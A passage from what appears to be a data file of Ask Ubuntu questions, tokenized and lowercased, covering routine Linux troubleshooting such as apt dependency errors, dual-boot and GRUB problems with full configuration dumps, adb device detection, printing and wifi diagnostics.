mounted if i click on remote_dir in a file browser . any clue regarding what could be missing ?
326978	restore /etc/init.d/rc.local	i 've mistakenly copied the /etc/rc.local over the /etc/init.d/rc.local and i was wondering how can i retore the init.d/rc.local contents ? is it possible to generate the original file or copy it from somewhere ? thanks in advance !
326983	problem with updating kubuntu 12.04	i have problems while trying to install updates , both via the update centre as via the terminal . the update centre gives me the following error : e : internal error , no file name for libssl1.0.0 if i type sudo apt-get update and then sudo apt-get upgrade the latter gives me an error reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : acroread : depends : acroread-bin libssl1.0.0 : breaks : libssl1.0.0 : i386 ( ! = 1.0.1-4ubuntu5.10 ) but 1.0.0e-2ubuntu4.5 is installed libssl1.0.0 : i386 : breaks : libssl1.0.0 ( ! = 1.0.0e-2ubuntu4.5 ) but 1.0.1-4ubuntu5.10 is installed e : unmet dependencies . try using -f. the -f suggestion results in the same error as the update centre . i have tried numerous things i found while googling , but none worked . none of the googled problems i found include this acroread problem . any help would be welcome
326984	logical / physical processors supported	can anyone tell me the maximum number of logical as well as the maximum number of physical processors supported in the latest release of ubuntu ? in the documentation online , i 've found the 8 processor support for 32 bit , and 256 processors for 64 bit , but it is unclear whether it is referring to logical or physical processors . thanks
326985	adb does not show nexus 4 device	i have installed the mtpfs tools for ubuntu and mounted the nexus 4 successfully . here the steps i followed : sudo apt-get install mtp-tools mtpfs sudo gedit /etc/udev/rules.d/51-android.rules added to the file 51-android.rules : # lg – nexus 4 subsystem==”usb” , attr { idvendor } ==”4ee1 , mode=”0666 '' i got the vendorid from lsusb , then sudo chmod +x /etc/udev/rules.d/51-android.rules sudo service udev restart sudo mkdir /media/nexus4 chmod 755 /media/nexus4 sudo mtpfs -o allow_other /media/nexus4 got everything from this site here . but unfortunately i ca n't list the nexus 4 with adb , when i run adb devices i get adb devices list of devices attached no devices are listed ... do i need to configure anything when i want to access the nexus with adb ?
326990	clock in unity top panel not display the digit 8	i just noticed the digital clock in the unity panel is n't displaying the digit 8 . i have it setup so it displays in the below format ... wed jul 31 09:45:22 when there are eights in time an example would look like this ... wed jul 31 09:4 :2 and that represents a time of 9:48:28 . anyone ever come across this before , really strange .
326995	convert postscript to pdf using user interface ?	i own small printshop and looking forward to work in linux os . now im trying ubuntu 12.04 on my old workstation . but the biggest problem i found i cant convert postscript files to pdf format using user interface . i just got no time to write all of the specs for every .pdf file in terminal using ghostscript ps2pdf . isnt out there anything like acrobat distiller for ubuntu ?
326998	when installing windows its cut 100 mb for system reserved from my other drive ext4 file system .may be hard disk dameged	i have 1-one ssd 128 s596 turbo on /dev/sda 40g ubuntu and remaining for windows to play game 2-one 2tb on /dev/sdb 3-one 2tb on /dev/sdc 4-one 3tb on /dev/sdd imaging what happend to me : windows cut the first 100 mb of my second drive and i ... ... ... : ( just ask do you want to create a system reserved partition , where do you ? why do you ? how do you ? nothing , just cut from another hdd i think because of the file-system format ext4 and it recognized as a raw partition . now my hard drive wont mount or had any partition table i tried to create a new partition table but it was unsuccessful
327002	trouble installing ubuntu wubi 12.04 on windows xp dell dimension 3000	i have previously installed ubuntu wubi 12.04 on my dell dimension 3000 with windows xp home . i succeeded , but i accidently made myself a standard user , not an admin . i uninstalled , then tried to reinstall , but it told me that it could not get the iso files , so i put the iso file in the same folder as wubi.exe . when i ran the wubi then , it ran perfectly , but when i launched ubuntu it was `` coping files '' , then it hung . the first time i installed it , i did n't have any trouble at all . please help me .
327003	facing problem in installing matlab2012a	how to open .bashrc in a basic text editor to edit it .
327004	ubuntu 13.04 with windows	i reinstalled windows 7 today , i have a live usb with ubuntu 13.04 installed with universal usb manager . i want to install ubuntu with windows 7 ( dual boot ) which already exists on my pc . i have 320 gig hard drive in which 100 gig is for windows ( already allocated ) , 120 gig for my files ( already allocated ) , 100 gig for ubuntu ( yet to allocate ) . i do n't get the option dual boot with windows 7 while trying with live usb ( ubuntu 13.04 ) why ? i tried with 100 gig unallocated and 100 gig in ntfs format ( both are the same 100 gig tried in different ways ) in advanced option ( i.e something else option ) it says no root file system selected . what is the easiest way i dual boot with windows 7 ultimate 64 bit ? which file format , can i also use that drive while using windows if so how ? help me . why dont i get an option dual boot with windows ?
327007	upgrade to rhythmbox 2.99.1 in xubuntu	i 'd like to get the updates of rhythmbox for xubuntu but am really struggling to work out how . i 've tried directly installing the deb from here but it gives an error about breaking package dependency with rhythmbox-mozilla ( currently 2.98 ) . i 've tried adding ppas but nothing seems to happen . i downloaded the zip file , unpacked it and did ./configure but get `` no such file or directory '' - configure is there but it 's configure.ac - is this a xfce/thunar vs nautilus/gnome problem ? will it not work with xubuntu ? any tips gratefully appreciated . installing experiemental things in x/ubuntu is so unbelievably complicated !
327008	how to install ubuntu 12.10 in window xp with fedora already installed ?	i am using window xp and fedora . now i want to use ubuntu 12.10 instead of fedora . can anyone please help me how to install ubuntu 12.10 by overriding fedora and without affecting existing windows os . in other words how to replace fedora with ubuntu without affecting windows xp . thanks , chetan
327009	black screen after grub	good afternoon . first of all , sorry for my english , i know it 's not the best you have ever read . this morning i installed ubuntu 13.04 and i was trying playing a little with its configuration ( preferences , nothing else ) ans downloading some programs , trying to programm with the terminal and stuff . when , a few minutes ago , i wanted to re-start windows , i found that i could n't . i get to grub , everything than expected and i have 5 options ( i 'm writting from memory , because i have not noted them ) : ubuntu additionals options for ubuntu memory test another memory test ( advance maybe ? ) windows ( loader ) on /dev/sda1 i choose the last option y it goes into windows , or i thought so . the fact is that after grub disappeared , i left a black screen and the top lines begin to appear as distorted colors ( if it 's important i can take a picture with the phone and upload it ) that does not extend to rest of the screen , there are 1 cm or something like that . i do n't find the solution nowhere because of everything i found is related to problems with grub does not appeared or something . i leave the report of a sudo fdisk -l command on a ubuntu terminal , hoping it can help : disco /dev/sda : 1000.2 gb , 1000204886016 bytes 255 cabezas , 63 sectores/pista , 121601 cilindros , 1953525168 sectores en total unidades = sectores de 1 * 512 = 512 bytes tamaño de sector ( lógico / físico ) : 512 bytes / 4096 bytes tamaño e/s ( mínimo/óptimo ) : 4096 bytes / 4096 bytes identificador del disco : 0x25233875 dispositivo inicio comienzo fin bloques id sistema /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 1245448800 622620976+ 7 hpfs/ntfs/exfat /dev/sda3 1245450238 1953523711 354036737 5 extendida la partición 3 no se inició en el limite físico del sector /dev/sda5 1245450240 1936783359 345666560 83 linux /dev/sda6 1936785408 1953523711 8369152 82 linux swap / solaris disco /dev/mapper/cryptswap1 : 8570 mb , 8570011648 bytes 255 cabezas , 63 sectores/pista , 1041 cilindros , 16738304 sectores en total unidades = sectores de 1 * 512 = 512 bytes tamaño de sector ( lógico / físico ) : 512 bytes / 4096 bytes tamaño e/s ( mínimo/óptimo ) : 4096 bytes / 4096 bytes identificador del disco : 0x9e01f612 el disco /dev/mapper/cryptswap1 no contiene una tabla de particiones válida i hope you can help me , i would be so grateful . greetings . edit : sorry i did n't know that i could use format . i 'm having problems with ubuntu 13.04 and windows 7 . result for cat /boot/grub/grub.cfg # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' if [ x '' $ { feature_menuentry_id } '' = xy ] ; then menuentry_id_option= '' -- id '' else menuentry_id_option= '' '' fi export menuentry_id_option if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { if [ x $ feature_all_video_module = xy ] ; then insmod all_video else insmod efi_gop insmod efi_uga insmod ieee1275_fb insmod vbe insmod vga insmod video_bochs insmod video_cirrus fi } if [ x $ feature_default_font_path = xy ] ; then font=unicode else insmod part_msdos insmod ext2 set root='hd0 , msdos5' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos5 -- hint-efi=hd0 , msdos5 -- hint-baremetal=ahci0 , msdos5 fb3c5402-5a59-4e52-99ea-b81b9c9c1586 else search -- no-floppy -- fs-uuid -- set=root fb3c5402-5a59-4e52-99ea-b81b9c9c1586 fi font= '' /usr/share/grub/unicode.pf2 '' fi if loadfont $ font ; then set gfxmode=auto load_video insmod gfxterm set locale_dir= $ prefix/locale set lang=es_es insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # function gfxmode { set gfxpayload= '' $ { 1 } '' if [ `` $ { 1 } '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ `` $ { recordfail } '' ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode menuentry 'ubuntu ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-simple-fb3c5402-5a59-4e52-99ea-b81b9c9c1586 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos5' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos5 -- hint-efi=hd0 , msdos5 -- hint-baremetal=ahci0 , msdos5 fb3c5402-5a59-4e52-99ea-b81b9c9c1586 else search -- no-floppy -- fs-uuid -- set=root fb3c5402-5a59-4e52-99ea-b81b9c9c1586 fi linux /boot/vmlinuz-3.8.0-19-generic root=uuid=fb3c5402-5a59-4e52-99ea-b81b9c9c1586 ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.8.0-19-generic } submenu 'opciones avanzadas para ubuntu ' $ menuentry_id_option 'gnulinux-advanced-fb3c5402-5a59-4e52-99ea-b81b9c9c1586 ' { menuentry 'ubuntu , con linux 3.8.0-19-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.8.0-19-generic-advanced-fb3c5402-5a59-4e52-99ea-b81b9c9c1586 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos5' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos5 -- hint-efi=hd0 , msdos5 -- hint-baremetal=ahci0 , msdos5 fb3c5402-5a59-4e52-99ea-b81b9c9c1586 else search -- no-floppy -- fs-uuid -- set=root fb3c5402-5a59-4e52-99ea-b81b9c9c1586 fi echo 'cargando linux 3.8.0-19-generic ... ' linux /boot/vmlinuz-3.8.0-19-generic root=uuid=fb3c5402-5a59-4e52-99ea-b81b9c9c1586 ro quiet splash $ vt_handoff echo 'cargando el disco ram inicial ... ' initrd /boot/initrd.img-3.8.0-19-generic } menuentry 'ubuntu , con linux 3.8.0-19-generic ( modo recuperación ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.8.0-19-generic-recovery-fb3c5402-5a59-4e52-99ea-b81b9c9c1586 ' { recordfail load_video insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos5' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos5 -- hint-efi=hd0 , msdos5 -- hint-baremetal=ahci0 , msdos5 fb3c5402-5a59-4e52-99ea-b81b9c9c1586 else search -- no-floppy -- fs-uuid -- set=root fb3c5402-5a59-4e52-99ea-b81b9c9c1586 fi echo 'cargando linux 3.8.0-19-generic ... ' linux /boot/vmlinuz-3.8.0-19-generic root=uuid=fb3c5402-5a59-4e52-99ea-b81b9c9c1586 ro recovery nomodeset echo 'cargando el disco ram inicial ... ' initrd /boot/initrd.img-3.8.0-19-generic } } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry `` memory test ( memtest86+ ) '' { insmod part_msdos insmod ext2 set root='hd0 , msdos5' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos5 -- hint-efi=hd0 , msdos5 -- hint-baremetal=ahci0 , msdos5 fb3c5402-5a59-4e52-99ea-b81b9c9c1586 else search -- no-floppy -- fs-uuid -- set=root fb3c5402-5a59-4e52-99ea-b81b9c9c1586 fi linux16 /boot/memtest86+.bin } menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { insmod part_msdos insmod ext2 set root='hd0 , msdos5' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos5 -- hint-efi=hd0 , msdos5 -- hint-baremetal=ahci0 , msdos5 fb3c5402-5a59-4e52-99ea-b81b9c9c1586 else search -- no-floppy -- fs-uuid -- set=root fb3c5402-5a59-4e52-99ea-b81b9c9c1586 fi linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # menuentry 'windows 7 ( loader ) ( en /dev/sda1 ) ' -- class windows -- class os $ menuentry_id_option 'osprober-chain-d87a07d87a07b274 ' { insmod part_msdos insmod ntfs set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 d87a07d87a07b274 else search -- no-floppy -- fs-uuid -- set=root d87a07d87a07b274 fi chainloader +1 } # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/30_uefi-firmware # # # # # # end /etc/grub.d/30_uefi-firmware # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ { config_directory } /custom.cfg ] ; then source $ { config_directory } /custom.cfg elif [ -z `` $ { config_directory } '' -a -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # result for cat /etc/default/grub : # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' if [ x '' $ { feature_menuentry_id } '' = xy ] ; then menuentry_id_option= '' -- id '' else menuentry_id_option= '' '' fi export menuentry_id_option if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { if [ x $ feature_all_video_module = xy ] ; then insmod all_video else insmod efi_gop insmod efi_uga insmod ieee1275_fb insmod vbe insmod vga insmod video_bochs insmod video_cirrus fi } if [ x $ feature_default_font_path = xy ] ; then font=unicode else insmod part_msdos insmod ext2 set root='hd0 , msdos5' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos5 -- hint-efi=hd0 , msdos5 -- hint-baremetal=ahci0 , msdos5 fb3c5402-5a59-4e52-99ea-b81b9c9c1586 else search -- no-floppy -- fs-uuid -- set=root fb3c5402-5a59-4e52-99ea-b81b9c9c1586 fi font= '' /usr/share/grub/unicode.pf2 '' fi if loadfont $ font ; then set gfxmode=auto load_video insmod gfxterm set locale_dir= $ prefix/locale set lang=es_es insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # function gfxmode { set gfxpayload= '' $ { 1 } '' if [ `` $ { 1 } '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ `` $ { recordfail } '' ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode menuentry 'ubuntu ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-simple-fb3c5402-5a59-4e52-99ea-b81b9c9c1586 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos5' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos5 -- hint-efi=hd0 , msdos5 -- hint-baremetal=ahci0 , msdos5 fb3c5402-5a59-4e52-99ea-b81b9c9c1586 else search -- no-floppy -- fs-uuid -- set=root fb3c5402-5a59-4e52-99ea-b81b9c9c1586 fi linux /boot/vmlinuz-3.8.0-19-generic root=uuid=fb3c5402-5a59-4e52-99ea-b81b9c9c1586 ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.8.0-19-generic } submenu 'opciones avanzadas para ubuntu ' $ menuentry_id_option 'gnulinux-advanced-fb3c5402-5a59-4e52-99ea-b81b9c9c1586 ' { menuentry 'ubuntu , con linux 3.8.0-19-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.8.0-19-generic-advanced-fb3c5402-5a59-4e52-99ea-b81b9c9c1586 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos5' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos5 -- hint-efi=hd0 , msdos5 -- hint-baremetal=ahci0 , msdos5 fb3c5402-5a59-4e52-99ea-b81b9c9c1586 else search -- no-floppy -- fs-uuid -- set=root fb3c5402-5a59-4e52-99ea-b81b9c9c1586 fi echo 'cargando linux 3.8.0-19-generic ... ' linux /boot/vmlinuz-3.8.0-19-generic root=uuid=fb3c5402-5a59-4e52-99ea-b81b9c9c1586 ro quiet splash $ vt_handoff echo 'cargando el disco ram inicial ... ' initrd /boot/initrd.img-3.8.0-19-generic } menuentry 'ubuntu , con linux 3.8.0-19-generic ( modo recuperación ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.8.0-19-generic-recovery-fb3c5402-5a59-4e52-99ea-b81b9c9c1586 ' { recordfail load_video insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos5' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos5 -- hint-efi=hd0 , msdos5 -- hint-baremetal=ahci0 , msdos5 fb3c5402-5a59-4e52-99ea-b81b9c9c1586 else search -- no-floppy -- fs-uuid -- set=root fb3c5402-5a59-4e52-99ea-b81b9c9c1586 fi echo 'cargando linux 3.8.0-19-generic ... ' linux /boot/vmlinuz-3.8.0-19-generic root=uuid=fb3c5402-5a59-4e52-99ea-b81b9c9c1586 ro recovery nomodeset echo 'cargando el disco ram inicial ... ' initrd /boot/initrd.img-3.8.0-19-generic } } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry `` memory test ( memtest86+ ) '' { insmod part_msdos insmod ext2 set root='hd0 , msdos5' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos5 -- hint-efi=hd0 , msdos5 -- hint-baremetal=ahci0 , msdos5 fb3c5402-5a59-4e52-99ea-b81b9c9c1586 else search -- no-floppy -- fs-uuid -- set=root fb3c5402-5a59-4e52-99ea-b81b9c9c1586 fi linux16 /boot/memtest86+.bin } menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { insmod part_msdos insmod ext2 set root='hd0 , msdos5' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos5 -- hint-efi=hd0 , msdos5 -- hint-baremetal=ahci0 , msdos5 fb3c5402-5a59-4e52-99ea-b81b9c9c1586 else search -- no-floppy -- fs-uuid -- set=root fb3c5402-5a59-4e52-99ea-b81b9c9c1586 fi linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # menuentry 'windows 7 ( loader ) ( en /dev/sda1 ) ' -- class windows -- class os $ menuentry_id_option 'osprober-chain-d87a07d87a07b274 ' { insmod part_msdos insmod ntfs set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 d87a07d87a07b274 else search -- no-floppy -- fs-uuid -- set=root d87a07d87a07b274 fi chainloader +1 } # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/30_uefi-firmware # # # # # # end /etc/grub.d/30_uefi-firmware # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ { config_directory } /custom.cfg ] ; then source $ { config_directory } /custom.cfg elif [ -z `` $ { config_directory } '' -a -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # alberto @ alberto-p67a-d3-b3 : ~ $ ^c alberto @ alberto-p67a-d3-b3 : ~ $ clear alberto @ alberto-p67a-d3-b3 : ~ $ cat /etc/default/grub # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default=0 # grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal=console # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' # grub_gfxmode=640x480 # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid=true # uncomment to disable generation of recovery mode menu entries # grub_disable_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 ''
327011	ca n't print on canon mf4450	i 've attached the printer via usb , ubuntu finds it , installs it ( both the mf4450 and the mf4450 ( fax ) printers , since it is a 4in1 ) but is not able to print even the test page . i 'm new to ubuntu as main system ( i was a windows 7 user up to 2012 , playing with some distro in vm but nothing more ) , what could i check / try ? i tagged it both 12.10 and 13.04 since the problem was there on the first and is still present after the upgrade to the second .
327012	113/tcp close ident report when i do port scan a website	i am not able to view some website i receive 113/tcp close ident , 3389/tcp closed ms-wbt-server report when i do port scan for some websites i think my all my tcp service is disabled is there any way to enable it .
327015	how do i configure ubuntu to reboot every day at a given time ?	using the terminal or a bash file , how can i configure ubuntu to reboot every day at ( say for instance ) 3 am ? in other words , i want to schedule an automatic reboot through the terminal . i have n't been able to find anything related to this on google or askubuntu , and i 'm fairly new to ubuntu in general ( just got my new raspberry pi ) .
327019	can i change the image of the icons on my taskbar ?	am i able to change the images of the currently running programs on my taskbar ? i have one very useful program with a very ugly and outdated icon and i 'd like to change it .
327023	ca n't remove a package - not installed so not removed	i 'm trying to update my version of catfish search , which is currently 0.6.4 and i 'm trying to get 0.7 . i installed 0.7 and it said it was installed in software centre , but when i click the shortcut , i get served 0.6.4 . so i uninstalled catfish from the software centre - now it says 0.7 is available to install ( so i must have done the software source / ppa bit right ) , but the icon is still in the shortcut menu & when i click it : catfish ( 0.6.4 ) is still there . so i did `` sudo apt-get remove catfish '' and it says `` not installed so not removed '' . yet if i type `` catfish '' , up it pops , instantly . i did some googling , did `` sudo apt-get remove catfish -- purge '' which removed one file . catfish is still there . since i installed 0.6.4 and previously 0.6.3 from zip files and those files are all in my home folder , i deleted all those files . catfish is still there . can anyone specular as to what 's going on ? ! thanks .
327026	where can i find old ubuntu boot splashes ?	i 've been trying to make a plymouth theme on ubuntu 13.04 and things are n't going so well . i was trying to create a theme that consists of a throbber going back and forth . i remember an ubuntu splash from a previous version ( one of the 11.xx series i believe ) that did the same thing . ideally i would just modify that , but i ca n't find a place to download it . is there any place where i can find it ?
327030	how do i correct text sizes on the web ?	i open for instance http : //www.wired.com/threatlevel/2013/07/warrantless-cell-tracking/ and the text on the left hand ( story ) is very small , but the test on the right ( advertisements ) is quite readable . is there a way to fix this ? by the way , this ask ubuntu page loads fine .
327035	i 'm not able to connect to my wifi	i 'm using ubuntu 12.04 , and i 'm having some issues in connecting to my home 's wifi . here 's the quick resume : my home wifi works , because i 'm surfing trhough ethernet my wireless drivers work , because i can successfully connect to my office 's wifi i 'm not even able to ping my router ! so , i can not understand the reason for it to not work ! i 'm using ubuntu 12.04 . here are informations about the connection and similar : alecive @ calliope : ~ $ nm-tool networkmanager tool state : connected ( global ) - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : atl1c state : unavailable default : no hw address : 00:24 : be : eb : da:87 capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : off - device : wlan0 [ infostradawifi-004309 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : 802.11 wifi driver : iwlwifi state : connected default : yes hw address : 00:27:10:2b:68:28 capabilities : speed : 135 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points ( * = current ap ) fastweb-1-00219631c110 : infra , 00:21:96:31 : c1:18 , freq 2462 mhz , rate 54 mb/s , strength 82 wpa vodafone-23070663 : infra , 00:24:89:94 : f6 : ae , freq 2437 mhz , rate 54 mb/s , strength 50 wpa2 belkin.0bc : infra , 08:86:3b:57:20 : bc , freq 2412 mhz , rate 54 mb/s , strength 44 wpa wpa2 ivica : infra , 00:11:50:36:9c : eb , freq 2412 mhz , rate 54 mb/s , strength 27 wpa paola wifi : infra , f8 : d1:11:62:8c : cf , freq 2462 mhz , rate 54 mb/s , strength 20 wpa wpa2 fastweb-1-0021964482e4 : infra , 00:21:96:44:82 : ec , freq 2462 mhz , rate 54 mb/s , strength 20 wpa ciao wireless : infra , 00:25:9c:88:68:56 , freq 2462 mhz , rate 54 mb/s , strength 27 wep tiscali : infra , 00:24:17 : d9:2a : b7 , freq 2462 mhz , rate 54 mb/s , strength 27 *infostradawifi-004309 : infra , ac : e2:15:4a:35:74 , freq 2427 mhz , rate 54 mb/s , strength 90 wpa lepre35 : infra , 58:98:35:7e : d6:9b , freq 2412 mhz , rate 54 mb/s , strength 24 wpa wpa2 tp-link : infra , 00:14:78 : ec:40 : aa , freq 2437 mhz , rate 54 mb/s , strength 24 wpa wpa2 alice-92034414 : infra , 00:19:3e:15:82 : b0 , freq 2437 mhz , rate 54 mb/s , strength 22 wpa mamadou : infra , f0:7d:68:11:3f : e7 , freq 2437 mhz , rate 11 mb/s , strength 24 wpa wpa2 m & a : infra , 00:17 : f2 : e4:83:67 , freq 2412 mhz , rate 54 mb/s , strength 29 wep vodafone-26148616 : infra , 00:24:89:82:19 : ee , freq 2412 mhz , rate 54 mb/s , strength 22 wpa2 fastweb-1-001ca2ae2e70 : infra , 00:1c : a2 : ae:2e:70 , freq 2437 mhz , rate 54 mb/s , strength 20 wpa ipv4 settings : address : 192.168.1.8 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.1.1 dns : 8.8.8.8 dns : 8.8.4.4 alecive @ calliope : ~ $ ip addr 1 : lo : < loopback , up , lower_up > mtu 16436 qdisc noqueue state unknown link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo inet6 : :1/128 scope host valid_lft forever preferred_lft forever 2 : eth0 : < no-carrier , broadcast , multicast , up > 